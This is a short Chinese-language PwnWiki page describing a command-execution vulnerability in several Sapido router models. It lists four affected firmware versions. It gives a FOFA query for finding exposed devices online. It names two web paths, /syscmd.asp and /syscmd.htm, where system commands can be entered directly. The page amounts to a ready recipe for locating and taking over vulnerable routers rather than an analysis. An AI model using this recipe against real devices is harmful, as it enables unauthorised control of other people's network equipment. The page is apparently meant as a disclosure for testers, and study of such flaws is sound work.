Sapido多款路由器命令执行漏洞

From PwnWiki
Revision as of 10:51, 24 June 2021 by Pwnwiki (talk | contribs) (Created page with "==漏洞影响==")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎中文(中国大陆)‎

漏洞影响

BR270n-v2.1.03

BRC76n-v2.1.03

GR297-v2.1.3

RB1732-v2.0.43


FOFA

app="Sapido-路由器"

漏洞利用

访问目标,直接输入系统命令即可执行。

http://xxx.xxx.xxx.xxx/syscmd.asp
http://xxx.xxx.xxx.xxx/syscmd.htm